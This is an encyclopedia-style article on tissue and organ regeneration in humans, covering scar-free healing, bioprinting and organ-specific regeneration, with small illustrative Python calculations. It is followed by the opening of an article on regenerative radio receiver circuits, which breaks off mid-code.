In humans with non-injured tissues, the tissue naturally regenerates over time; by default, newly available cells replace expended cells. For example, the body regenerates a full bone within ten years, while non-injured skin tissue is regenerated within two weeks. [ 2 ] With injured tissue, the body usually has a different response. This emergency response usually involves building a degree of scar tissue over a time period longer than a regenerative response would take, as has been proven clinically [ 7 ] and via observation. [ clarification needed ] There are many more historical and nuanced understandings of regeneration processes. In full-thickness wounds under 2 mm, regeneration generally occurs before scarring. [ 8 ] In 2008, it was found that in full-thickness wounds over 3 mm, a wound needed a material [ clarify ] inserted in order to induce full tissue regeneration. [ 9 ] [ 10 ]
Whereas third-degree burns heal slowly by scarring, by 2016 it was known that full-thickness fractional photothermolysis holes heal without scarring. [ 1 ] Up to 40% of the full-thickness skin in an area can be removed without scarring, in a fractional pattern, via coring of tissue. [ 1 ]
Some human organs and tissues regenerate rather than simply scar, as a result of injury. These include the liver, fingertips, and endometrium. More information is now known regarding the passive replacement of tissues in the human body, as well as the mechanics of stem cells . Advances in research have enabled the induced regeneration of many more tissues and organs than previously thought possible. The aim for these techniques is to use these techniques in the near future for the purpose of regenerating any tissue type in the human body. [ citation needed ]
By 2016, regeneration had been operationalised and induced by four main techniques: regeneration by instrument; [ 1 ] regeneration by materials; [ 2 ] [ 3 ] regeneration by 3D printing; [ 3 ] and regeneration by drugs. [ 4 ] [ 5 ] [ 6 ] By 2016, regeneration by instrument, regeneration by materials and regeneration by drugs had been generally operationalised in vivo (inside living tissues), while regeneration by 3D printing had been generally operationalised in vitro (inside the lab) in order to create and prepare tissue for transplantation . [ 3 ]
A cut by a knife or a scalpel generally scars, though a piercing by a needle does not. [ 1 ] [ 11 ] In 1976, a 3 by 3 cm scar on a non-diabetic was regenerated by insulin injections, and the researchers, highlighting earlier research, argued that the insulin was regenerating the tissue. [ 4 ] [ 5 ] The anecdotal evidence also highlighted that a syringe was one of two variables that helped bring about the regeneration of the arm scar. [ 4 ] The insulin was injected into the four quadrants of the scar three times a day for eighty-two days. [ 4 ] After eighty-two days of consecutive injections, the scar was resolved, and it was noted that no scar was observable by the human eye. [ 4 ] After seven months the area was checked again, and it was once again noted that no scar could be seen. [ 4 ]
In 1997, it was shown that wounds created with an instrument that are under 2 mm can heal scar-free, [ 8 ] [ failed verification ] but wounds larger than 2 mm healed with a scar. [ 8 ] [ failed verification ]
In 2013, it was proven in pig tissue that full-thickness microcolumns of tissue less than 0.5 mm in diameter could be removed and that the replacement tissue was regenerative tissue, not scar. The tissue was removed in a fractional pattern, with over 40% of a square area removed, and all of the fractional full-thickness holes in the square area healed without scarring. [ 12 ] In 2016 this fractional-pattern technique was also proven in human tissue. [ 1 ] In 2021, more people were paying attention to the possibility of scar-free healing alongside new technologies involving instruments. [ 13 ]
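For intuition about the geometry of such a fractional pattern, the minimal sketch below estimates how many sub-0.5 mm cores per square centimetre a 40% removal fraction implies; the uniform, non-overlapping circular-core geometry is a simplifying assumption.

```python
# How many full-thickness microcolumns does a 40% fractional coring pattern imply?
# Uniform, non-overlapping circular cores are a simplifying assumption.
import math

DIAMETER_MM = 0.5      # core diameter, from the studies above
FILL_FRACTION = 0.40   # fraction of the area removed

core_area_mm2 = math.pi * (DIAMETER_MM / 2.0) ** 2   # ~0.196 mm^2 per core
cores_per_cm2 = FILL_FRACTION * 100.0 / core_area_mm2

print(f"~{cores_per_cm2:.0f} cores per cm^2")        # ~204 with these numbers
```

The point of the pattern is that each core is individually small enough to heal regeneratively, even though the holes collectively remove a large share of the tissue.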
Generally, humans can regenerate injured tissues in vivo over limited distances of up to 2 mm. The further a wound extends beyond 2 mm, the more regeneration needs to be induced. By 2009, via the use of materials, induced regeneration could be achieved across a tissue rupture of up to 1 cm. [ 2 ] Bridging the wound, the material allowed cells to cross the wound gap; the material then degraded. This technology was first used inside a broken urethra in 1996. [ 2 ] [ 3 ] In 2012, using materials, a full urethra was restored in vivo. [ 3 ]
Macrophage polarization is a strategy for skin regeneration. [ 14 ] Macrophages are differentiated from circulating monocytes. [ 14 ] Macrophages display a range of phenotypes varying from the M1, pro-inflammatory type to the M2, pro-regenerative type. [ 14 ] Material hydrogels polarise macrophages into the key M2 regenerative phenotype in vitro. [ 14 ] In 2017, hydrogels provided full regeneration of skin, with hair follicles, after partial excision of scars in pigs and after full thickness wound incisions in pigs. [ 14 ]
In 2009, the regeneration of hollow organs and tissues with a long diffusion distance was a little more challenging. Therefore, to regenerate hollow organs and tissues with a long diffusion distance, the tissue had to be regenerated inside the lab via the use of a 3D printer. [ 2 ]
Various tissues that have been regenerated by in vitro 3D printing include:
Extrusion-based printing is a type of printing in which material is pushed through a nozzle and extruded onto a surface or medium. While material is being extruded, either the nozzle or the print bed is moved so that the material can be placed in complex shapes across its medium. Layer upon layer of material is placed until a 3D structure is formed. The extruded material comes out as a liquid and is solidified through various means depending on the chemical or physical properties of the material. For example, the material can be solidified through light-activated polymerization, in which light causes the material to harden. The material can also be hardened through the use of chemicals or enzymes. [ 20 ] Some examples of bioinks used in extrusion-based printing include some alginates, hyaluronic acid, and gellan gum. [ 21 ]
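As a back-of-envelope design check for extrusion-based printing (not a procedure from the cited studies), conservation of volume links the plunger speed of a syringe-driven extruder to the travel speed of the nozzle. All dimensions in the sketch below are illustrative assumptions.

```python
# Match syringe plunger speed to nozzle output in extrusion bioprinting.
# Conservation of volume: plunger_area * plunger_speed = strand_area * print_speed.
# All dimensions below are illustrative assumptions.
import math

NOZZLE_DIAMETER_MM = 0.4    # printed strand assumed equal to the nozzle diameter
SYRINGE_DIAMETER_MM = 12.0  # inner diameter of the bioink syringe
PRINT_SPEED_MM_S = 10.0     # nozzle travel speed over the print bed

strand_area = math.pi * (NOZZLE_DIAMETER_MM / 2) ** 2
plunger_area = math.pi * (SYRINGE_DIAMETER_MM / 2) ** 2

flow_mm3_s = strand_area * PRINT_SPEED_MM_S   # ~1.26 mm^3/s
plunger_speed = flow_mm3_s / plunger_area     # ~0.011 mm/s

print(f"flow ~{flow_mm3_s:.2f} mm^3/s, plunger speed ~{plunger_speed * 1000:.0f} um/s")
```

The large syringe-to-nozzle area ratio is why plunger motion must be slow and precise: small plunger errors translate into large variations in strand width.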
Inkjet printing is similar to extrusion-based printing in that layers of material are placed upon one another and can be hardened using various methods. Inkjet-based printing differs, however, in that the material is sprayed in droplets onto selected locations to form layers, rather than placed as a continuous stream. Inkjet printers can often hold multiple types of ink at once and can rapidly switch between them. [ 20 ] Examples of bioinks used in inkjet-based printing are fibrinogen and hydroxyapatite. [ 21 ]
SLA printing is a method in which a laser is shone onto a photoreactive liquid material to harden or polymerize it. Instead of material being pushed through a nozzle or jet, the material sits in a large basin and is slowly hardened. Because it uses light to harden the material, an SLA printer can offer very high resolution, at a lower speed than other methods. This method is often used for protein scaffolding and for providing structural support for other printed biological materials. [ 20 ] Examples of bioinks used in SLA printers include fibrin, collagen, and some alginates. [ 21 ]
By 2012, four standard levels of regenerative complexity in printed tissues were acknowledged across various academic institutions:
In 2012 it was possible, inside the lab, to grow tissue from the size of half a postage stamp to the size of a football field within 60 days. Most cell types could be grown and expanded outside of the body, with the exception of the liver, nerve and pancreas, as these tissue types need stem cell populations. [ 3 ]
In 2024, researchers were able to 3D print a human heart with a biphasic bioink containing pluripotent stem cells (PSC). The technique they proposed and tested would first print the external features of the organ before then printing the internal features such as internal vasculature inside the previously printed structure. Both sets of printing were performed by extruding the bioink filament into layered structures set in a microgel medium. This technique was called the “SPIRIT” technique and allowed for the printing of a full-sized heart at significantly faster speeds than previous methods. [ 22 ]
In 2022, researchers proposed a new method for printing vascularized human liver tissue. This new method consisted of using a 3D printer capable of holding seven different bioinks, with the ability to switch rapidly between these different bioinks to print different structures and shapes in the liver tissue. Due to the overall complexity of the organ, they were unable to print an entire liver but were still able to successfully print pieces of densely vascularized liver tissue. [ 20 ] [ 22 ]
A new technique for 3D printing kidney tissue was developed in 2020 which resulted in the successful creation of a miniature, vascularized kidney. To do this, the researchers used an extrusion-method printer that could be fed two bioinks and would extrude the bioink as hollow tubes, with one tube coating the other. In 2021, researchers expanded upon this technique by using PSCs differentiated into the correct cell type in the bioink. Using the PSCs allowed for increased vascularization, as the PSCs would differentiate into the correct cell types to build the structures of the blood vessels, rather than already differentiated cells having to be placed in the right locations. [ 20 ] [ 22 ]
In 2019, a method for printing alveoli was developed in which 2D slices of photosensitive hydrogel are successively cured to form a 3D structure of the alveoli. This produces a soft material that is able to easily expand and contract, while also maintaining biocompatibility. The level of curing for the hydrogel is controlled using additive food coloring which absorbs light and increases the curing at that location. This allows the curing to be directed to better form 3D shapes. This method was able to form functional and vascularized alveoli. In 2021, this technique was improved by using an inkjet printing method, which increased the accuracy and precision of alveolar structure. With this ink-jet method, researchers were able to create functional portions of alveolar tissue with increased stability and surfactant secretion. [ 20 ] [ 22 ]
In 2020, researchers developed a method for tissue repair of male genitals through the use of a bioink they designed. This bioink included stem cells along with the ink itself to increase its compatibility with the body and its ability to heal. A hydrogel scaffold was printed using a 3D print-ultraviolet photo-crosslinking strategy, similar in concept to an SLA printer. Their design was successfully integrated into the corpus cavernosum of a rabbit's penis. The printed structure returned functionality to the organ and increased its fertility. While not tested or created using human cells, further efforts are being made to advance this field. [ 22 ]
Lipoatrophy is the localised loss of fat in tissue. It is common in diabetics who use conventional insulin injection treatment. [ 4 ] In 1949, a much purer form of insulin was shown, instead of causing lipoatrophy, to regenerate the localised loss of fat after injection into diabetics. [ 4 ] In 1984, it was shown that different insulin injections have different regenerative responses with regard to creating skin fats in the same person. [ 5 ] It was shown in the same body that conventional forms of insulin injection cause lipoatrophy while highly purified insulin injections cause lipohypertrophy . [ 5 ] In 1976, the regenerative response was shown to work in a non-diabetic after a 3 x 3 cm lipoatrophic arm scar was treated with pure monocomponent porcine soluble insulin. [ 5 ] [ 4 ] Insulin was injected by syringe under the skin equally in the four quadrants of the defect. [ 4 ] To layer four units of insulin evenly into the base of the defect, each quadrant received one unit of insulin three times a day, for eighty-two days. [ 4 ] After eighty-two days of consecutive injections the defect regenerated to normal tissue. [ 4 ] [ 5 ]
In 2016, scientists could transform a skin cell into any other tissue type via the use of drugs. [ 6 ] The technique was noted as safer than genetic reprogramming, which in 2016 was a medical concern. [ 6 ] The technique used a cocktail of chemicals and enabled efficient on-site regeneration without any genetic reprogramming. [ 6 ] In 2016, it was hoped that this drug could one day be used to regenerate tissue at the site of injury. [ 6 ] In 2017, scientists could turn many cell types (such as brain and heart) into skin. [ 23 ]
Scientists found that leprosy -causing bacteria viably regenerate and rejuvenate the liver in their armadillo hosts, which may enable novel human therapies based on knowledge or components gained from naturally evolved organisms or capabilities. [ 24 ] [ 25 ]
Cardiomyocyte necrosis activates an inflammatory response that serves to clear the injured myocardium of dead cells and stimulates repair, but may also extend injury. Research suggests that the cell types involved in the process play an important role: monocyte-derived macrophages tend to induce inflammation while inhibiting cardiac regeneration, whereas tissue-resident macrophages may help restore tissue structure and function. [ 26 ]
After breaking down during the menstrual cycle , the endometrium re-epithelializes swiftly and regenerates. [ 27 ] While tissues with an uninterrupted morphology, such as uninjured soft tissue, regenerate completely and consistently, the endometrium is the only human tissue that completely and consistently regenerates after a disruption of its morphology. [ 27 ] The inner lining of the uterus is the only adult tissue to undergo rapid cyclic shedding and regeneration without scarring, shedding and restoring itself roughly within a 7-day window on a monthly basis. [ 28 ] All other adult tissues, upon rapid shedding or injury, can scar. [ citation needed ]
In May 1932, L. H. McKim published a report describing the regeneration of an adult digit-tip following amputation. A house surgeon in the Montreal General Hospital underwent amputation of the distal phalanx to stop the spread of an infection. In less than one month following surgery, x-ray analysis showed the regrowth of bone while macroscopic observation showed the regrowth of nail and skin. [ 29 ] This is one of the earliest recorded examples of adult human digit-tip regeneration. [ 30 ]
Studies in the 1970s showed that children up to the age of 10 or so who lose fingertips in accidents can regrow the tip of the digit within a month provided their wounds are not sealed up with flaps of skin – the de facto treatment in such emergencies. They normally will not have a fingerprint , and if there is any piece of the finger nail left it will grow back as well, usually in a square shape rather than round. [ 31 ] [ 32 ]
In August 2005, Lee Spievack, then in his early sixties, accidentally sliced off the tip of his right middle finger just above the first phalanx . His brother, Dr. Alan Spievack, was researching regeneration and provided him with powdered extracellular matrix , developed by Dr. Stephen Badylak of the McGowan Institute of Regenerative Medicine . Mr. Spievack covered the wound with the powder, and the tip of his finger re-grew in four weeks. [ 33 ] The news was released in 2007. Ben Goldacre has described this as "the missing finger that never was", claiming that fingertips regrow and quoted Simon Kay , professor of hand surgery at the University of Leeds , who from the picture provided by Goldacre described the case as seemingly "an ordinary fingertip injury with quite unremarkable healing" [ 34 ]
A similar story was reported by CNN. A woman named Deepa Kulkarni lost the tip of her little finger and was initially told by doctors that nothing could be done. Her personal research and consultation with several specialists including Badylak eventually resulted in her undergoing regenerative therapy and regaining her fingertip. [ 35 ]
Regenerative capacity of the kidney has been recently explored. [ 36 ]
The basic functional and structural unit of the kidney is the nephron , which is mainly composed of four components: the glomerulus, the tubules, the collecting duct and the peritubular capillaries. The regenerative capacity of the mammalian kidney is limited compared to that of lower vertebrates. [ citation needed ]
In the mammalian kidney, the regeneration of the tubular component following an acute injury is well known. Recently, regeneration of the glomerulus has also been documented. Following an acute injury, the proximal tubule is damaged most, and the injured epithelial cells slough off the basement membrane of the nephron. The surviving epithelial cells, however, undergo migration, dedifferentiation, proliferation, and redifferentiation to replenish the epithelial lining of the proximal tubule after injury. Recently, the presence and participation of kidney stem cells in tubular regeneration has been shown, although the concept of kidney stem cells is still emerging. In addition to the surviving tubular epithelial cells and kidney stem cells, bone marrow stem cells have also been shown to participate in regeneration of the proximal tubule; however, the mechanisms remain controversial. Studies examining the capacity of bone marrow stem cells to differentiate into renal cells are emerging. [ 37 ]
Like other organs, the kidney is also known to regenerate completely in lower vertebrates such as fish. Some of the known fish that show remarkable capacity of kidney regeneration are goldfish, skates , rays, and sharks. In these fish, the entire nephron regenerates following injury or partial removal of the kidney. [ citation needed ]
The human liver is particularly known for its ability to regenerate, and is capable of doing so from only one quarter of its tissue, [ 38 ] due chiefly to the unipotency of hepatocytes . [ 39 ] Resection of the liver induces proliferation of the remaining hepatocytes until the lost mass is restored, with the intensity of the liver's response directly proportional to the mass resected. For almost 80 years, surgical resection of the liver in rodents has been a very useful model for the study of cell proliferation. [ 40 ] [ 41 ]
Toes damaged by gangrene and burns in older people can also regrow with the nail and toe print returning after medical treatment for gangrene. [ 42 ]
The vas deferens can grow back together after a vasectomy , resulting in vasectomy failure. [ 43 ] This occurs because the epithelium of the vas deferens, like the epithelium of some other parts of the body, is capable of regenerating and forming a new tube if the vas deferens is damaged or severed. [ 44 ] Even when as much as five centimeters (two inches) of the vas deferens is removed, it can still grow back together and become reattached, allowing sperm to once again pass through the vas deferens and restoring fertility . [ 44 ]
There are several human tissues that have been successfully or partially induced to regenerate. Many fall under the topic of regenerative medicine , which includes the methods and research conducted with the aim of regenerating the organs and tissues of humans as a result of injury. The major strategies of regenerative medicine include dedifferentiating injury site cells, transplanting stem cells, implanting lab-grown tissues and organs, and implanting bioartificial tissues. [ citation needed ]
In 1999, the bladder became the first organ to be regenerated and given to patients, seven in all; as of 2014, these regenerated bladders were still functioning inside the recipients. [ 15 ]
In 1949, purified insulin was shown to regenerate fat in diabetics with lipoatrophy . [ 4 ] In 1976, after 82 days of consecutive injections into a scar, purified insulin was shown to safely regenerate fat and completely regenerate skin in a non-diabetic. [ 4 ] [ 5 ]
During a high-fat diet, and during hair follicle growth, mature adipocytes (fat cells) are naturally formed in multiple tissues. [ 45 ] Fat tissue has been implicated in the inducement of tissue regeneration. Myofibroblasts are the fibroblasts responsible for scarring, and in 2017 it was found that the regeneration of fat transformed myofibroblasts into adipocytes instead of scar tissue. [ 46 ] [ 45 ] Scientists also identified bone morphogenetic protein (BMP) signalling as important for the transformation of myofibroblasts into adipocytes during skin and fat regeneration. [ 46 ]
Cardiovascular diseases are the leading cause of death worldwide, and have increased proportionally from 25.8% of global deaths in 1990, to 31.5% of deaths in 2013. [ 47 ] This is true in all areas of the world except Africa . [ 47 ] [ 48 ] In addition, during a typical myocardial infarction or heart attack, an estimated one billion cardiac cells are lost. [ 49 ] The scarring that results is then responsible for greatly increasing the risk of life-threatening abnormal heart rhythms or arrhythmias . Therefore, the ability to naturally regenerate the heart would have an enormous impact on modern healthcare. However, while several animals can regenerate heart damage (e.g. the axolotl ), mammalian cardiomyocytes (heart muscle cells) cannot proliferate (multiply) and heart damage causes scarring and fibrosis . [ citation needed ]
Despite the earlier belief that human cardiomyocytes are not generated later in life, a more recent study found that this is not the case. The study took advantage of nuclear bomb testing and other radioactive sources during the Atomic Age , which sharply raised the level of carbon-14 in the atmosphere and therefore in the cells of biologically active inhabitants. [ 50 ] The researchers extracted DNA from the myocardium of the research subjects and, by comparing the presence of carbon-14 with the stable and abundant carbon-12 , found that cardiomyocytes do in fact renew, at a rate slowing from 1% per year at the age of 25 to 0.45% per year at the age of 75. [ 50 ] This amounts to less than half of the original cardiomyocytes being replaced during the average lifespan. However, serious doubts have been cast on the validity of this research, including the appropriateness of the samples as representative of normally aging hearts. [ 51 ]
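The arithmetic behind "less than half" can be illustrated with a short calculation. The following is a rough sketch only: it assumes, purely for illustration, that the annual renewal rate falls linearly from 1% at age 25 to 0.45% at age 75, a simplification not stated in the cited study.

```python
# Hedged back-of-the-envelope estimate of cardiomyocyte turnover between ages 25 and 75.
# The linear interpolation between the two quoted rates is an assumption for illustration.

def renewal_rate(age):
    """Annual turnover fraction, interpolated linearly between 1%/yr (age 25) and 0.45%/yr (age 75)."""
    return 0.01 + (0.0045 - 0.01) * (age - 25) / (75 - 25)

surviving_original = 1.0
for age in range(25, 75):
    # each year, a small fraction of the remaining original cells is replaced
    surviving_original *= 1.0 - renewal_rate(age)

print(f"Original cardiomyocytes remaining at 75: {surviving_original:.0%}")
print(f"Replaced over those 50 years:            {1 - surviving_original:.0%}")
```

Under these assumptions roughly 30% of the original cells are replaced between ages 25 and 75, consistent with the statement that less than half are replaced over an average lifespan.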
Further research has been conducted that supports the potential for human cardiac regeneration. Inhibition of p38 MAP kinase was found to induce mitosis in adult mammalian cardiomyocytes, [ 52 ] while treatment with FGF1 and p38 MAP kinase inhibitors was found to regenerate the heart, reduce scarring, and improve cardiac function in rats with cardiac injury. [ 53 ]
One of the most promising sources of heart regeneration is the use of stem cells. It was demonstrated in mice that there is a resident population of stem cells or cardiac progenitors in the adult heart; this population was shown to be reprogrammed to differentiate into cardiomyocytes that replaced those lost during heart tissue death. [ 54 ] In humans specifically, a "cardiac mesenchymal feeder layer" was found in the myocardium that renewed the cells with progenitors that differentiated into mature cardiac cells. [ 55 ] These studies show that the human heart contains stem cells that could potentially be induced to regenerate the heart when needed, rather than just being used to replace expended cells. [ citation needed ]
Loss of the myocardium due to disease often leads to heart failure; therefore, it would be useful to be able to take cells from elsewhere in the heart to replenish those lost. This was achieved in 2010 when mature cardiac fibroblasts were reprogrammed directly into cardiomyocyte-like cells. This was done using three transcription factors : GATA4 , Mef2c , and Tbx5 . [ 56 ] Cardiac fibroblasts make up more than half of all heart cells and are usually not able to conduct contractions (are not cardiogenic), but those reprogrammed were able to contract spontaneously. [ 56 ] The significance is that fibroblasts from the damaged heart or from elsewhere, may be a source of functional cardiomyocytes for regeneration. [ citation needed ]
Simply injecting functioning cardiac cells into a damaged heart is only partially effective. In order to achieve more reliable results, structures composed of the cells need to be produced and then transplanted. Masumoto and his team designed a method of producing sheets of cardiomyocytes and vascular cells from human iPSCs . These sheets were then transplanted onto infarcted hearts of rats, leading to significantly improved cardiac function. [ 57 ] These sheets were still found to be present four weeks later. [ 57 ] Research has also been conducted into the engineering of heart valves. Tissue-engineered heart valves derived from human cells have been created in vitro and transplanted into a non-human primate model. These showed a promising amount of cellular repopulation even after eight weeks, and succeeded in outperforming currently-used non-biological valves. [ 58 ] In 2021, researchers demonstrated a switchable iPSCs- reprogramming -based approach for regeneration of damaged heart without tumor-formation in mice. [ 59 ] In April 2019, researchers 3D printed a prototype human heart the size of a rabbit's heart. [ 19 ]
Chronic obstructive pulmonary disease (COPD) is one of the most widespread health threats today. It affects 329 million people worldwide, nearly 5% of the global population. Having killed over 3 million people in 2012, COPD was the third greatest cause of death that year. [ 60 ] Worse still, due to increasing smoking rates and aging populations in many countries, the number of deaths from COPD and other chronic lung diseases is predicted to keep rising. [ 61 ] Developments in the lung's capacity for regeneration are therefore in high demand.
It has been shown that bone marrow-derived cells could be the source of progenitor cells of multiple cell lineages, and a 2004 study suggested that one of these cell types was involved in lung regeneration. [ 62 ] Therefore, a potential source of cells for lung regeneration has been found; however, due to advances in inducing stem cells and directing their differentiation, major progress in lung regeneration has consistently featured the use of patient-derived iPSCs and bioscaffolds.
The extracellular matrix is the key to generating entire organs in vitro. It was found that by carefully removing the cells of an entire lung, a "footprint" is left behind that can guide cellular adhesion and differentiation if a population of lung epithelial cells and chondrocytes are added. [ 63 ] This has serious applications in regenerative medicine, particularly as a 2012 study successfully purified a population of lung progenitor cells that were derived from embryonic stem cells. These can then be used to re-cellularise a three-dimensional lung tissue scaffold. [ 64 ]
A 2010 investigation used the ECM scaffold to produce entire lungs in vitro to be transplanted into living rats. [ 65 ] These successfully enabled gas exchange but for short time intervals only. [ 65 ] Nevertheless, this was a huge leap towards whole lung regeneration and transplants for humans, which has already taken another step forward with the lung regeneration of a non-human primate. [ 66 ]
Cystic fibrosis is another disease of the lungs, which is highly fatal and genetically linked to a mutation in the CFTR gene . Through growing patient-specific lung epithelium in vitro, lung tissue expressing the cystic fibrosis phenotype has been achieved. [ 67 ] This is so that modelling and drug testing of the disease pathology can be carried out with the hope of regenerative medical applications. [ citation needed ]
Penises have been successfully regenerated in the lab. [ 15 ] Penises are harder to regenerate than the skin, bladder and vagina due to their structural complexity. [ 15 ]
A goal of spinal cord injury research is to promote neuroregeneration , the reconnection of damaged neural circuits. [ 68 ] The nerves of the spinal cord are a tissue that requires a stem cell population to regenerate. In 2012, Darek Fidyka , a Polish fireman paralysed by a spinal cord injury, underwent a procedure in which olfactory ensheathing cells (OECs) were extracted from his olfactory bulbs and injected, in vivo, into the site of the previous injury. Fidyka eventually regained feeling, movement and sensation in his limbs, especially on the side where the cells were injected; he also reported regaining sexual function. Fidyka can now drive and can walk some distance aided by a frame. He is believed to be the first person in the world to recover sensory function after a complete severing of the spinal nerves. [ 69 ] [ 70 ]
The thymus gland is one of the first organs to degenerate in normal healthy individuals. Researchers from the University of Edinburgh have succeeded in regenerating a living organ that closely resembles a juvenile thymus in terms of structure and gene expression profile. [ 71 ]
Between the years 2005 and 2008, four women with vaginal hypoplasia due to Müllerian agenesis were given regenerated vaginas. [ 72 ] Up to eight years after the transplants, all organs have normal function and structure. [ 15 ] | https://en.wikipedia.org/wiki/Regeneration_in_humans |
A regenerative circuit is an amplifier circuit that employs positive feedback (also known as regeneration or reaction ). [ 1 ] [ 2 ] Some of the output of the amplifying device is applied back to its input to add to the input signal, increasing the amplification. [ 3 ] One example is the Schmitt trigger (which is also known as a regenerative comparator ), but the most common use of the term is in RF amplifiers, and especially regenerative receivers , to greatly increase the gain of a single amplifier stage. [ 4 ] [ 5 ] [ 6 ]
The regenerative receiver was invented in 1912 [ 7 ] and patented in 1914 [ 8 ] by American electrical engineer Edwin Armstrong when he was an undergraduate at Columbia University . [ 9 ] It was widely used between 1915 and World War II . Advantages of regenerative receivers include increased sensitivity with modest hardware requirements, and increased selectivity, because the feedback loop around the tuned circuit (via a "tickler" winding or a tapping on the coil) introduces negative resistance that raises the Q of the tuned circuit.
Due partly to its tendency to radiate interference when oscillating, [ 6 ] [ 5 ] : p.190 by the 1930s the regenerative receiver was largely superseded by other TRF receiver designs (for example "reflex" receivers ) and especially by another Armstrong invention, the superheterodyne receiver , [ 10 ] and it is now largely considered obsolete. [ 5 ] : p.190 [ 11 ] Regeneration (now called positive feedback) is still widely used in other areas of electronics, such as in oscillators , active filters , and bootstrapped amplifiers .
A receiver circuit that used larger amounts of regeneration in a more complicated way to achieve even higher amplification, the superregenerative receiver , was also invented by Armstrong in 1922. [ 11 ] [ 5 ] : p.190 It was never widely used in general commercial receivers, but due to its small parts count it was used in specialized applications. One widespread use during WWII was in IFF transceivers , where a single tuned circuit completed the entire electronic system. It is still used in a few specialized low-data-rate applications, [ 11 ] such as garage door openers , [ 12 ] wireless networking devices, [ 11 ] walkie-talkies and toys.
The gain of any amplifying device, such as a vacuum tube , transistor , or op amp , can be increased by feeding some of the energy from its output back into its input in phase with the original input signal. This is called positive feedback or regeneration . [ 13 ] [ 3 ] Because of the large amplification possible with regeneration, regenerative receivers often use only a single amplifying element (tube or transistor). [ 14 ] In a regenerative receiver the output of the tube or transistor is connected back to its own input through a tuned circuit (LC circuit). [ 15 ] [ 16 ] The tuned circuit allows positive feedback only at its resonant frequency . In regenerative receivers using only one active device, the same tuned circuit is coupled to the antenna and also serves to select the radio frequency to be received, usually by means of variable capacitance. In the regenerative circuit discussed here, the active device also functions as a detector ; this circuit is also known as a regenerative detector . [ 16 ] A regeneration control is usually provided for adjusting the amount of feedback (the loop gain ). It is desirable for the circuit design to provide regeneration control that can gradually increase feedback to the point of oscillation and that provides control of the oscillation from small to larger amplitude and back to no oscillation without jumps of amplitude or hysteresis in control. [ 17 ] [ 18 ] [ 19 ] [ 20 ]
Two important attributes of a radio receiver are sensitivity and selectivity . [ 21 ] The regenerative detector provides sensitivity and selectivity due to voltage amplification and the characteristics of a resonant circuit consisting of inductance and capacitance. The regenerative voltage amplification is $u_o = u/(1 - ua)$, where $u$ is the non-regenerative amplification and $a$ is the portion of the output signal fed back to the L2 C2 circuit. As $1 - ua$ becomes smaller, the amplification increases. [ 22 ] The $Q$ of the tuned circuit (L2 C2) without regeneration is $Q = X_L/R$, where $X_L$ is the reactance of the coil and $R$ represents the total dissipative loss of the tuned circuit. The positive feedback compensates for the energy loss caused by $R$, so it may be viewed as introducing a negative resistance $R_r$ into the tuned circuit. [ 19 ] The $Q$ of the tuned circuit with regeneration is $Q_{reg} = X_L/(R - |R_r|)$. [ 19 ] The regeneration increases the $Q$. Oscillation begins when $|R_r| = R$. [ 19 ]
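To make the effect of the feedback fraction concrete, here is a minimal sketch (with illustrative, assumed component values, not taken from any cited design) that evaluates the regenerative amplification and the regenerated Q as feedback is increased toward the oscillation threshold.

```python
def regen_gain(u, a):
    """Regenerative amplification u_o = u / (1 - u*a); valid only below oscillation (u*a < 1)."""
    return u / (1.0 - u * a)

def regen_q(x_l, r, r_neg):
    """Q of the tuned circuit when feedback introduces an equivalent negative resistance |r_neg|."""
    return x_l / (r - abs(r_neg))

# Assumed values: non-regenerative gain of 10, a coil with 100 ohms of reactance
# and 5 ohms of equivalent dissipative loss.
u, x_l, r = 10.0, 100.0, 5.0

for a in (0.0, 0.05, 0.09, 0.099):
    print(f"feedback a = {a:.3f}  ->  gain = {regen_gain(u, a):8.1f}")

for r_neg in (0.0, 2.5, 4.5, 4.95):
    print(f"|R_r| = {r_neg:4.2f} ohm  ->  Q = {regen_q(x_l, r, r_neg):7.1f}")

# Both quantities grow without bound as u*a -> 1 and |R_r| -> R, the onset of oscillation.
```

The same calculation also suggests why the non-oscillating gain is limited in practice: close to the threshold, small drifts in device characteristics or supply voltage change 1 − ua enough to push the detector into oscillation.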
Regeneration can increase the detection gain of a detector by a factor of 1,700 or more. This is quite an improvement, especially for the low-gain vacuum tubes of the 1920s and early 1930s. The type 36 screen-grid tube (obsolete since the mid-1930s) had a non-regenerative detection gain (audio frequency plate voltage divided by radio frequency input voltage) of only 9.2 at 7.2 MHz, but in a regenerative detector, had detection gain as high as 7,900 at critical regeneration (non-oscillating) and as high as 15,800 with regeneration just above critical. [ 16 ] The "... non-oscillating regenerative amplification is limited by the stability of the circuit elements, tube [or device] characteristics and [stability of] supply voltages which determine the maximum value of regeneration obtainable without self-oscillation". [ 16 ] Intrinsically, there is little or no difference in the gain and stability available from vacuum tubes, JFETs, MOSFETs or bipolar junction transistors (BJTs).
A major improvement in stability and a small improvement in available gain for reception of CW radiotelegraphy is provided by the use of a separate oscillator, known as a heterodyne oscillator or beat oscillator . [ 16 ] [ 23 ] Providing the oscillation separately from the detector allows the regenerative detector to be set for maximum gain and selectivity - which is always in the non-oscillating condition. [ 16 ] [ 24 ] Interaction between the detector and the beat oscillator can be minimized by operating the beat oscillator at half of the receiver operating frequency, using the second harmonic of the beat oscillator in the detector. [ 23 ]
For AM reception, the gain of the loop is adjusted so that it is just below the level required for oscillation (a loop gain of just less than one). The result is to greatly increase the gain of the amplifier at the bandpass (resonant) frequency, while not increasing it at other frequencies. The incoming radio signal is thus amplified by a large factor, 10³–10⁵, increasing the receiver's sensitivity to weak signals. The high gain also reduces the circuit's bandwidth (increasing the Q ) by an equal factor, increasing the selectivity of the receiver. [ 25 ]
For the reception of CW radiotelegraphy ( Morse code ), the feedback is increased just to the point of oscillation. The tuned circuit is adjusted to provide typically 400 to 1000 Hertz difference between the receiver oscillation frequency and the desired transmitting station's signal frequency. The two frequencies beat in the nonlinear amplifier, generating heterodyne or beat frequencies. [ 26 ] The difference frequency, typically 400 to 1000 Hertz, is in the audio range; so it is heard as a tone in the receiver's speaker whenever the station's signal is present.
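Why the difference frequency ends up in the loudspeaker can be shown numerically. The sketch below (illustrative frequencies only, not from the cited sources) multiplies the incoming carrier by the detector's own oscillation, offset by an assumed 700 Hz, and finds the dominant audio-range component of the product.

```python
import numpy as np

fs = 1_000_000              # sample rate in Hz (assumed, well above all frequencies involved)
t = np.arange(0, 0.02, 1 / fs)
f_signal = 100_000          # incoming CW carrier, Hz (illustrative)
f_osc = 100_700             # receiver's own oscillation, offset by 700 Hz (illustrative)

# The nonlinear detector effectively multiplies the two signals; the product contains
# components at the difference (700 Hz) and the sum (200.7 kHz) frequencies.
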